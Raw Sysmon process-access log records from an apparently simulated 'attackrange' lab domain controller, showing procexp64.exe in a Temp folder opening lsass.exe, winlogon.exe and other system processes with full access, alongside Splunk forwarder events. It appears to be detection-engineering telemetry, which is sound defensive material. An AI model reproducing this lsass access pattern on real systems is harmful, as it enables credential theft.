15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.252{732C744F-322A-6010-C3A2-00000000A301}22245324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.096{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-322A-6010-C3A2-00000000A301}2224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.080{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.080{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.080{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.080{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.080{732C744F-1517-600B-0500-00000000A301}6402204C:\Windows\system32\csrss.exe{732C744F-322A-6010-C3A2-00000000A301}2224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.080{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-322A-6010-C3A2-00000000A301}2224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.081{732C744F-322A-6010-C3A2-00000000A301}2224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785821Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785820Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785819Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785818Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785817Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785816Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:55.330{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785815Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 